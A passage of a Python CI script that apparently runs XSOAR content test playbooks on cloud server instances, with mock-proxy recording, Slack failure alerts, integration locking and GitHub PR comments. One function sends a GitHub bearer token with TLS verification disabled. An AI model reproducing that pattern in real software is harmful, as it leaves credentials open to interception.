        prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
        run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
                       playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
                       server_url, build_name, prints_manager, thread_index=thread_index)
        prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
                                     include_timestamp=True)
        return
    mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
             playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
             server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
    """GET `url` over verified TLS and return the parsed JSON body.

    :param url: full URL to request
    :param params_dict: optional dict of query-string parameters
    :raises requests.HTTPError: when the response status is an error code

    The previous implementation wrapped the call in
    ``except Exception as e: raise e`` - a no-op that only added noise; letting
    exceptions propagate naturally is equivalent and keeps the traceback clean.
    """
    res = requests.request("GET",
                           url,
                           verify=True,
                           params=params_dict,
                           )
    res.raise_for_status()
    return res.json()
def get_user_name_from_circle(circleci_token, build_number):
    """Look up the display name of the user who triggered a CircleCI build.

    Returns an empty string when the build has no user details.
    """
    build_url = ("https://circleci.com/api/v1.1/project/github/demisto/content/"
                 "{0}?circle-token={1}").format(build_number, circleci_token)
    response = http_request(build_url)
    return response.get('user', {}).get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
    """Direct-message the build's author on Slack about a failed test playbook.

    The message links to the incident work-plan when an incident id is known
    (inc_id != -1). No message is sent when the author cannot be matched to a
    Slack user.
    """
    circle_user_name = get_user_name_from_circle(circle_ci, build_number)
    sc = SlackClient(slack)
    user_id = retrieve_id(circle_user_name, sc)
    text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
        else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
    if user_id:
        sc.api_call(
            "chat.postMessage",
            channel=user_id,
            username="Content CircleCI",
            as_user="False",
            text=text
        )
def retrieve_id(circle_user_name, sc):
    """Return the Slack user id whose normalized real name matches `circle_user_name`.

    :param circle_user_name: display name as reported by CircleCI
    :param sc: SlackClient used for the `users.list` API call
    :return: the matching user's id, or '' when no member matches
    """
    res = sc.api_call('users.list')
    user_list = res.get('members', [])
    for user in user_list:
        profile = user.get('profile', {})
        name = profile.get('real_name_normalized', '')
        if name == circle_user_name:
            # Return on the first match instead of scanning the rest of the
            # member list (the old loop kept going and kept the last match).
            return user.get('id', '')
    return ''
def create_result_files(tests_data_keeper):
    """Dump the failed / skipped test names into the text files consumed by the build."""
    outputs = {
        "./Tests/failed_tests.txt": tests_data_keeper.failed_playbooks,
        './Tests/skipped_tests.txt': tests_data_keeper.skipped_tests,
        './Tests/skipped_integrations.txt': tests_data_keeper.skipped_integrations,
    }
    for file_path, entries in outputs.items():
        with open(file_path, "w") as result_file:
            result_file.write('\n'.join(entries))
def change_placeholders_to_values(placeholders_map, config_item):
    """Replaces placeholders in the object to their real values

    Args:
        placeholders_map: (dict)
             Dict that holds the real values to be replaced for each placeholder.
        config_item: (json object)
            Integration configuration object.

    Returns:
        dict. json object with the real configuration.
    """
    # Substituting on the JSON dump handles arbitrarily nested structures in one pass.
    serialized = json.dumps(config_item)
    for placeholder, real_value in placeholders_map.items():
        serialized = serialized.replace(placeholder, real_value)
    return json.loads(serialized)
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
                           prints_manager, placeholders_map, thread_index=0):
    """Fill each integration dict with the matching credentials from the secret conf.

    Mutates `integrations` in place (adds 'params', 'byoi', 'instance_name',
    'validate_test'). Returns False - after queuing an error message - when
    several configured instances match an integration and none is selected via
    `instance_names`; True otherwise.
    """
    for integration in integrations:
        integration_params = [change_placeholders_to_values(placeholders_map, item) for item
                              in secret_params if item['name'] == integration['name']]
        if integration_params:
            matched_integration_params = integration_params[0]
            # Multiple configured instances: the test must pick one by instance_name.
            if len(integration_params) != 1:
                found_matching_instance = False
                for item in integration_params:
                    if item.get('instance_name', 'Not Found') in instance_names:
                        matched_integration_params = item
                        found_matching_instance = True
                if not found_matching_instance:
                    optional_instance_names = [optional_integration.get('instance_name', 'None')
                                               for optional_integration in integration_params]
                    error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
                                                                 integration['name'],
                                                                 '\n'.join(optional_instance_names))
                    prints_manager.add_print_job(error_msg, print_error, thread_index)
                    return False
            integration['params'] = matched_integration_params.get('params', {})
            integration['byoi'] = matched_integration_params.get('byoi', True)
            integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
            integration['validate_test'] = matched_integration_params.get('validate_test', True)
        elif integration['name'] == 'Demisto REST API':
            # Built-in integration: point it at the local server with the build's API key.
            integration['params'] = {
                'url': 'https://localhost',
                'apikey': demisto_api_key,
                'insecure': True,
            }
    return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
    """Build integration descriptors for a test and note skipped / nightly ones.

    Mutates `skipped_integration` (a set) in place. Skipped integrations are
    still included in the returned descriptors - callers filter using the
    returned skipped list.

    :return: (names skipped for this test, integration dicts, nightly-only flag)
    """
    integrations = []
    test_skipped_integration = []
    is_nightly_integration = False
    for name in integrations_conf:
        if name in skipped_integrations_conf:
            skipped_integration.add("{0} - reason: {1}".format(name, skipped_integrations_conf[name]))
            test_skipped_integration.append(name)
        if name in nightly_integrations:
            is_nightly_integration = True
        # string description
        integrations.append({'name': name, 'params': {}})
    return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
    """Read the filter conf and return (filtered test names, filter configured?, run all?).

    Nightly builds ignore the filter file entirely and run everything.
    """
    if is_nightly:
        # TODO: verify this response
        return [], False, True
    with open(FILTER_CONF, 'r') as filter_file:
        filtered_tests = [line.strip('\n') for line in filter_file.readlines()]
    return filtered_tests, bool(filtered_tests), RUN_ALL_TESTS_FORMAT in filtered_tests
def load_conf_files(conf_path, secret_conf_path):
    """Load the test conf JSON and, when a path is given, the secret conf JSON.

    :return: (conf dict, secret conf dict or None)
    """
    with open(conf_path) as conf_file:
        conf = json.load(conf_file)
    secret_conf = None
    if secret_conf_path:
        with open(secret_conf_path) as secret_file:
            secret_conf = json.load(secret_file)
    return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
                      nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
                      run_all_tests, is_filter_configured, filtered_tests, skipped_tests, secret_params,
                      failed_playbooks, playbook_skipped_integration, unmockable_integrations,
                      succeed_playbooks, slack, circle_ci, build_number, server, build_name,
                      server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
                      prints_manager, thread_index=0, is_ami=True):
    """
    Decide whether a single test configuration `t` should run, and run it.

    Applies the skip rules in order (nightly-only, filter file, skipped-tests
    conf, skipped integrations, server version range), resolves the test's
    integration parameters from the secret conf, and finally delegates to
    run_test(). Results are communicated by mutating the accumulator
    collections passed in (skipped_tests, failed_playbooks,
    playbook_skipped_integration, succeed_playbooks) rather than by a return
    value.
    """
    playbook_id = t['playbookID']
    nightly_test = t.get('nightly', False)
    integrations_conf = t.get('integrations', [])
    instance_names_conf = t.get('instance_names', [])
    test_message = 'playbook: ' + playbook_id
    test_options = {
        'timeout': t.get('timeout', default_test_timeout),
        'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
        'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
    }
    # conf.json allows a single string instead of a list for these fields.
    if not isinstance(integrations_conf, list):
        integrations_conf = [integrations_conf, ]
    if not isinstance(instance_names_conf, list):
        instance_names_conf = [instance_names_conf, ]
    test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
        integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
    if playbook_id in filtered_tests:
        # Record skipped-but-critical integrations only for tests selected by the filter.
        playbook_skipped_integration.update(test_skipped_integration)
    skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
    # Skip nightly test
    if skip_nightly_test:
        prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
                                     include_timestamp=True)
        prints_manager.add_print_job('Skip test', print, thread_index)
        prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
                                     include_timestamp=True)
        return
    if not run_all_tests:
        # Skip filtered test
        if is_filter_configured and playbook_id not in filtered_tests:
            return
        # Skip bad test
        if playbook_id in skipped_tests_conf:
            skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
            return
        # Skip integration
        if test_skipped_integration:
            return
    # Skip version mismatch test
    test_from_version = t.get('fromversion', '0.0.0')
    test_to_version = t.get('toversion', '99.99.99')
    if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
        prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
                                     include_timestamp=True)
        warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
                                                                                                  test_from_version,
                                                                                                  test_to_version)
        prints_manager.add_print_job(warning_message, print_warning, thread_index)
        prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
                                     include_timestamp=True)
        return
    placeholders_map = {'%%SERVER_HOST%%': server}
    are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
                                            playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
    # Missing/ambiguous integration params count as a test failure, not a skip.
    if not are_params_set:
        failed_playbooks.append(playbook_id)
        return
    test_message = update_test_msg(integrations, test_message)
    options = options_handler()
    stdout, stderr = get_docker_memory_data()
    text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
    if options.nightly and options.memCheck and not tests_settings.is_local_run:
        # Report docker memory and process stats to Slack on nightly memCheck builds.
        send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
        stdout, stderr = get_docker_processes_data()
        text = stdout if not stderr else stderr
        send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
    run_test(t, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
             integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message,
             test_options, slack, circle_ci, build_number, server, build_name, prints_manager,
             is_ami, thread_index=thread_index)
def load_env_results_json():
    """Return the parsed env-results file contents, or {} when the file does not exist."""
    if os.path.isfile(ENV_RESULTS_PATH):
        with open(ENV_RESULTS_PATH, 'r') as env_file:
            return json.load(env_file)
    return {}
def get_server_numeric_version(ami_env, is_local_run=False):
    """
    Resolve the numeric server version from the AMI name of the active instance.

    Arguments:
        ami_env: (str)
            AMI version name (role) to look for in the env results.
        is_local_run: (bool)
            when running locally, assume latest version.

    Returns:
        (str) Three-part numeric server version.
    """
    default_version = '99.99.98'
    if is_local_run:
        print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
        return default_version
    env_json = load_env_results_json()
    if not env_json:
        print_warning(f'Did not find {ENV_RESULTS_PATH} file, assuming server version is {default_version}.')
        return default_version
    instances_ami_names = {env.get('AmiName') for env in env_json if ami_env in env.get('Role', '')}
    if len(instances_ami_names) != 1:
        print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
                      f' Assuming server version is {default_version}')
        return default_version
    ami_name = next(iter(instances_ami_names))
    version_matches = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
                                 ami_name)
    server_numeric_version = version_matches[0] if version_matches else default_version
    # Normalize a two-part version (e.g. "5.5") to three parts ("5.5.0").
    if server_numeric_version.count('.') == 1:
        server_numeric_version += ".0"
    print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
    return server_numeric_version
def get_instances_ips_and_names(tests_settings):
    """Return (role, instance DNS) pairs for all env instances, or the single user-supplied server."""
    if tests_settings.server:
        # NOTE(review): this branch returns a flat [server] list rather than the
        # (role, dns) tuples of the branch below - callers appear to rely on that; verify.
        return [tests_settings.server]
    return [(env.get('Role'), env.get('InstanceDNS')) for env in load_env_results_json()]
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
    """Return the conf.json test records whose playbookID appears in tests_names_to_search."""
    conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    matching_records = []
    for record in conf['tests']:
        playbook_name = record.get("playbookID")
        if playbook_name and playbook_name in tests_names_to_search:
            matching_records.append(record)
    return matching_records
def get_json_file(path):
    """Load and return the parsed JSON content of the file at `path`."""
    # json.load consumes the file object directly - no need for read() + loads().
    with open(path, 'r') as json_file:
        return json.load(json_file)
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
                    tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
    """
    Run all the given mockable and unmockable tests against a single server.

    Mockable tests run first behind the MITM proxy (AMI builds only), then the
    proxy configuration is cleared, containers are reset, and the mock-disabled
    tests run. Results are accumulated into `tests_data_keeper`; on a 'master'
    build, mock files are pushed and a PR comment may be added, and proxy
    metrics are best-effort uploaded to GCS.
    """
    server = SERVER_URL.format(server_ip)
    server_numeric_version = tests_settings.serverNumericVersion
    start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
    prints_manager.add_print_job(start_message, print, thread_index)
    is_nightly = tests_settings.nightly
    is_memory_check = tests_settings.memCheck
    slack = tests_settings.slack
    circle_ci = tests_settings.circleci
    build_number = tests_settings.buildNumber
    build_name = tests_settings.buildName
    conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    demisto_api_key = tests_settings.api_key
    demisto_user = secret_conf['username']
    demisto_pass = secret_conf['userPassword']
    default_test_timeout = conf.get('testTimeout', 30)
    tests = conf['tests']
    skipped_tests_conf = conf['skipped_tests']
    nightly_integrations = conf['nightly_integrations']
    skipped_integrations_conf = conf['skipped_integrations']
    unmockable_integrations = conf['unmockable_integrations']
    secret_params = secret_conf['integrations'] if secret_conf else []
    filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
    # NOTE(review): forcing is_nightly when a filter is configured disables the
    # nightly-skip logic for filtered runs - confirm this is intentional.
    if is_filter_configured and not run_all_tests:
        is_nightly = True
    if not tests or len(tests) == 0:
        prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
        prints_manager.execute_thread_prints(thread_index)
        return
    xsoar_client = demisto_client.configure(base_url=server, username=demisto_user,
                                            password=demisto_pass, verify_ssl=False)
    # turn off telemetry
    turn_off_telemetry(xsoar_client)
    proxy = None
    if is_ami:
        ami = AMIConnection(server_ip)
        ami.clone_mock_data()
        proxy = MITMProxy(server_ip)
    failed_playbooks = []
    succeed_playbooks = []
    skipped_tests = set([])
    skipped_integration = set([])
    playbook_skipped_integration = set([])
    disable_all_integrations(xsoar_client, prints_manager, thread_index=thread_index)
    prints_manager.execute_thread_prints(thread_index)
    mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
    unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
    if is_nightly and is_memory_check:
        mem_lim, err = get_docker_limit()
        send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
                           f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
                           'Content CircleCI', 'False')
    try:
        # first run the mock tests to avoid mockless side effects in container
        if is_ami and mockable_tests:
            proxy.configure_proxy_in_demisto(proxy=proxy.ami.docker_ip + ':' + proxy.PROXY_PORT,
                                             username=demisto_user, password=demisto_pass,
                                             server=server)
            executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
            while not mockable_tests_queue.empty():
                t = mockable_tests_queue.get()
                # Detects a full pass over the queue without progress (all tests locked
                # elsewhere) and sleeps before retrying.
                executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
                                                                                         prints_manager,
                                                                                         t,
                                                                                         thread_index,
                                                                                         mockable_tests_queue)
                run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
                                  nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
                                  run_all_tests, is_filter_configured, filtered_tests,
                                  skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
                                  unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
                                  build_name, server_numeric_version, demisto_user, demisto_pass,
                                  demisto_api_key, prints_manager, thread_index=thread_index)
            # Clear the proxy configuration before running mock-disabled tests.
            proxy.configure_proxy_in_demisto(username=demisto_user, password=demisto_pass, server=server)
            # reset containers after clearing the proxy server configuration
            reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index)
        prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
        executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
        while not unmockable_tests_queue.empty():
            t = unmockable_tests_queue.get()
            executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
                                                                                     prints_manager,
                                                                                     t,
                                                                                     thread_index,
                                                                                     unmockable_tests_queue)
            run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
                              skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
                              is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
                              secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
                              succeed_playbooks, slack, circle_ci, build_number, server, build_name,
                              server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
                              prints_manager, thread_index, is_ami)
            prints_manager.execute_thread_prints(thread_index)
    except Exception as exc:
        if exc.__class__ == ApiException:
            error_message = exc.body
        else:
            error_message = f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}'
        prints_manager.add_print_job(error_message, print_error, thread_index)
        prints_manager.execute_thread_prints(thread_index)
        failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
        raise
    finally:
        tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
                                         skipped_integration, unmockable_integrations)
        if is_ami:
            tests_data_keeper.add_proxy_related_test_data(proxy)
            if build_name == 'master':
                updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
                prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
                ami.upload_mock_files(build_name, build_number)
        if playbook_skipped_integration and build_name == 'master':
            comment = 'The following integrations are skipped and critical for the test:\n {}'. \
                format('\n- '.join(playbook_skipped_integration))
            add_pr_comment(comment)
        # Sending proxy metrics to GCP
        try:
            storage_client = storage.Client()
            now = datetime.datetime.now().replace(microsecond=0).isoformat()
            # each log line will be comprised of the following metrics:
            # - Date
            # - Count of successful tests
            # - Count of failed tests
            # - Count of successful rerecords
            # - Count of failed rerecords
            # - IDs of the playbooks that were rerecorded successfully
            # - Ids of the playbooks that have failed rerecording
            # NOTE(review): when is_ami is False, `proxy` is None and the attribute
            # access below raises - the except clause then logs a failure; confirm
            # this path is acceptable for non-AMI runs.
            new_proxy_line = f'{now},' \
                             f'{proxy.successful_tests_count},' \
                             f'{proxy.failed_tests_count},' \
                             f'{proxy.successful_rerecord_count},' \
                             f'{proxy.failed_rerecord_count},' \
                             f'{";".join(proxy.rerecorded_tests)},' \
                             f'{";".join(proxy.failed_rerecord_tests)}\n'
            bucket = storage_client.bucket(BUCKET_NAME)
            # Google storage objects are immutable and there is no way to append to them.
            # The workaround is to create a new temp file and then compose the log file with the new created file
            # see here for more info https://cloud.google.com/storage/docs/json_api/v1/objects/compose
            new_file_blob = bucket.blob(f'{LOCKS_PATH}/{WORKFLOW_ID}.txt')
            new_file_blob.upload_from_string(new_proxy_line)
            current_file_blob = bucket.blob(f'{LOCKS_PATH}/{PROXY_LOG_FILE_NAME}')
            current_file_blob.compose([current_file_blob, new_file_blob])
            new_file_blob.delete()
        except Exception:
            prints_manager.add_print_job("Failed to save proxy metrics", print, thread_index)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
                                                  prints_manager: ParallelPrintsManager,
                                                  t: dict,
                                                  thread_index: int,
                                                  unmockable_tests_queue: Queue) -> set:
    """
    Track which test configurations were already seen during the current pass over the queue.

    Seeing the same test configuration twice means a full round over the queue
    completed without progress (the remaining tests are locked by other
    executions). In that case a new round is started: the tracking set is reset
    and this thread sleeps for 30 seconds to let the locked tests be released.

    Args:
        executed_in_current_round: String representations (as they appear in conf.json)
            of tests already executed in the current round.
        prints_manager: ParallelPrintsManager object.
        t: Test configuration as it appears in conf.json.
        thread_index: Currently executing thread.
        unmockable_tests_queue: The queue of remaining tests.

    Returns:
        The tracking set for the next iteration: a fresh set holding only the
        current test when a round just completed, otherwise the input set with
        the current test added.
    """
    test_key = str(t)
    if test_key not in executed_in_current_round:
        executed_in_current_round.add(test_key)
        return executed_in_current_round
    prints_manager.add_print_job(
        'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
        print,
        thread_index)
    time.sleep(30)
    return {test_key}
def initialize_queue_and_executed_tests_set(tests):
    """Put every test record into a FIFO queue and pair it with an empty 'executed this round' set."""
    tests_queue = Queue()
    for test_record in tests:
        tests_queue.put(test_record)
    return set(), tests_queue
def get_unmockable_tests(tests_settings):
    """Return the playbook IDs of all conf.json tests that cannot run through the mock proxy."""
    conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    unmockable_integrations = conf['unmockable_integrations']
    unmockable_tests = []
    for test_record in conf['tests']:
        test_name = test_record.get("playbookID")
        if not test_name:
            continue
        integrations_used_in_test = get_used_integrations(test_record)
        # A test is unmockable when it uses no integrations at all, or when at
        # least one of its integrations is listed as unmockable.
        if not integrations_used_in_test or any(
                name in unmockable_integrations for name in integrations_used_in_test):
            unmockable_tests.append(test_name)
    return unmockable_tests
def get_all_tests(tests_settings):
    """Return every playbookID listed in conf.json (records without one are ignored)."""
    conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    return [record.get("playbookID") for record in conf['tests'] if record.get("playbookID")]
def manage_tests(tests_settings):
    """
    This function manages the execution of Demisto's tests.

    Dispatches to one of three modes:
    1. A user-supplied server: all tests run against it (nothing is mockable).
    2. AMI configuration (the common CI path): nightly builds run in parallel,
       one thread per instance; regular builds run serially per matching instance.
    3. Neither (rare): assume latest server version and run everything unmocked.
    Finally prints a summary, writes result files, and exits non-zero on failures.

    Args:
        tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be ran
    """
    tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
                                                                     tests_settings.is_local_run)
    instances_ips = get_instances_ips_and_names(tests_settings)
    is_nightly = tests_settings.nightly
    number_of_instances = len(instances_ips)
    prints_manager = ParallelPrintsManager(number_of_instances)
    tests_data_keeper = TestsDataKeeper()
    if tests_settings.server:
        # If the user supplied a server - all tests will be done on that server.
        server_ip = tests_settings.server
        print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
        print("Starts tests with server url - https://{}".format(server_ip))
        all_tests = get_all_tests(tests_settings)
        mockable_tests = []
        print(tests_settings.specific_tests_to_run)
        unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
        execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
                        thread_index=0, is_ami=False)
    elif tests_settings.isAMI:
        # Running tests in AMI configuration.
        # This is the way we run most tests, including running Circle for PRs and nightly.
        if is_nightly:
            # If the build is a nightly build, run tests in parallel.
            test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
            current_thread_index = 0
            all_unmockable_tests_list = get_unmockable_tests(tests_settings)
            threads_array = []
            for ami_instance_name, ami_instance_ip in instances_ips:
                if ami_instance_name == tests_settings.serverVersion:  # Only run tests for given AMI Role
                    current_instance = ami_instance_ip
                    tests_allocation_for_instance = test_allocation[current_thread_index]
                    # Split this instance's allocation into mockable/unmockable groups.
                    unmockable_tests = [test for test in all_unmockable_tests_list
                                        if test in tests_allocation_for_instance]
                    mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
                    print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
                    print("Starts tests with server url - https://{}".format(ami_instance_ip))
                    if number_of_instances == 1:
                        # No point spawning a thread for a single instance.
                        execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
                                        tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
                    else:
                        thread_kwargs = {
                            "tests_settings": tests_settings,
                            "server_ip": current_instance,
                            "mockable_tests_names": mockable_tests,
                            "unmockable_tests_names": unmockable_tests,
                            "thread_index": current_thread_index,
                            "prints_manager": prints_manager,
                            "tests_data_keeper": tests_data_keeper,
                        }
                        t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
                        threads_array.append(t)
                        t.start()
                        current_thread_index += 1
            for t in threads_array:
                t.join()
        else:
            for ami_instance_name, ami_instance_ip in instances_ips:
                if ami_instance_name == tests_settings.serverVersion:
                    print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
                    print("Starts tests with server url - https://{}".format(ami_instance_ip))
                    all_tests = get_all_tests(tests_settings)
                    unmockable_tests = get_unmockable_tests(tests_settings)
                    mockable_tests = [test for test in all_tests if test not in unmockable_tests]
                    execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
                                    tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
                    sleep(8)
    else:
        # TODO: understand better when this occurs and what will be the settings
        # This case is rare, and usually occurs on two cases:
        # 1. When someone from Server wants to trigger a content build on their branch.
        # 2. When someone from content wants to run tests on a specific build.
        server_numeric_version = '99.99.98'  # assume latest
        print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
        instance_ip = instances_ips[0][1]
        all_tests = get_all_tests(tests_settings)
        execute_testing(tests_settings, instance_ip, [], all_tests,
                        tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
    print_test_summary(tests_data_keeper, tests_settings.isAMI)
    create_result_files(tests_data_keeper)
    if tests_data_keeper.failed_playbooks:
        tests_failed_msg = "Some tests have failed. Not destroying instances."
        print(tests_failed_msg)
        sys.exit(1)
def add_pr_comment(comment):
    """
    Post `comment` on the open pull request matching the current CircleCI branch/commit.

    Searches GitHub for open PRs whose head matches the current commit SHA and branch;
    when exactly one is found, the comment is posted to it, otherwise a warning is
    printed. All failures are logged as warnings and never raised.

    Args:
        comment (str): The comment body to post.
    """
    token = os.environ['CONTENT_GITHUB_TOKEN']
    branch_name = os.environ['CIRCLE_BRANCH']
    sha1 = os.environ['CIRCLE_SHA1']
    query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
    url = 'https://api.github.com/search/issues'
    headers = {'Authorization': 'Bearer ' + token}
    try:
        res = requests.get(url + query, headers=headers, verify=False)
        res = handle_github_response(res)
        if res and res.get('total_count', 0) == 1:
            issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
            if issue_url:
                res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
                handle_github_response(res)
        else:
            # The search may match zero or several PRs - either way we cannot pick one.
            # (Old message claimed "more then one" even when no PR matched.)
            print_warning('Add pull request comment failed: did not find exactly one open pull request for branch {}.'
                          .format(branch_name))
    except Exception as e:
        print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
    """
    Parse a GitHub API response, printing a warning on HTTP errors.

    Args:
        response: A requests.Response object returned by the GitHub API.

    Returns:
        dict: The parsed JSON body of the response.
    """
    res_dict = response.json()
    # Bug fix: the HTTP status flag lives on the response object, not on the parsed
    # JSON dict (a dict has no `.ok` attribute, so the old check always raised
    # AttributeError instead of warning).
    if not response.ok:
        print_warning('Add pull request comment failed: {}'.
                      format(res_dict.get('message')))
    return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
                      test_timeout: int,
                      prints_manager: ParallelPrintsManager,
                      thread_index: int,
                      conf_json_path: str) -> None:
    """
    Context manager that locks a test's integrations for the duration of the test.

    Yields True when all integrations were locked (and releases them on exit),
    or False when the lock attempt failed (in which case nothing is released).

    Args:
        integrations_details: test integrations details
        test_timeout: test timeout in seconds
        prints_manager: ParallelPrintsManager object
        thread_index: The index of the thread that executes the unlocking
        conf_json_path: Path to conf.json file

    Yields:
        A boolean indicating the lock attempt result
    """
    locked = safe_lock_integrations(test_timeout, prints_manager, integrations_details, thread_index, conf_json_path)
    try:
        yield locked
    finally:
        # Only release locks this execution actually acquired.
        if locked:
            safe_unlock_integrations(prints_manager, integrations_details, thread_index)
            prints_manager.execute_thread_prints(thread_index)
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
    """
    Release the test's integration locks, logging (but never raising) unexpected errors
    so that other tests keep executing.

    Args:
        prints_manager: ParallelPrintsManager object
        integrations_details: Details of the currently executed test
        thread_index: The index of the thread that executes the unlocking
    """
    try:
        # The test may have run for a long time - create a fresh storage client.
        unlock_integrations(integrations_details, prints_manager, storage.Client(), thread_index)
    except Exception as e:
        prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
                                     print_warning,
                                     thread_index,
                                     include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
                           prints_manager: ParallelPrintsManager,
                           integrations_details: list,
                           thread_index: int,
                           conf_json_path: str) -> bool:
    """
    Attempt to lock the test's integrations, returning False (and logging a warning)
    on any unexpected error instead of raising.

    Args:
        test_timeout: Test timeout in seconds
        prints_manager: ParallelPrintsManager object
        integrations_details: test integrations details
        thread_index: The index of the thread that executes the locking
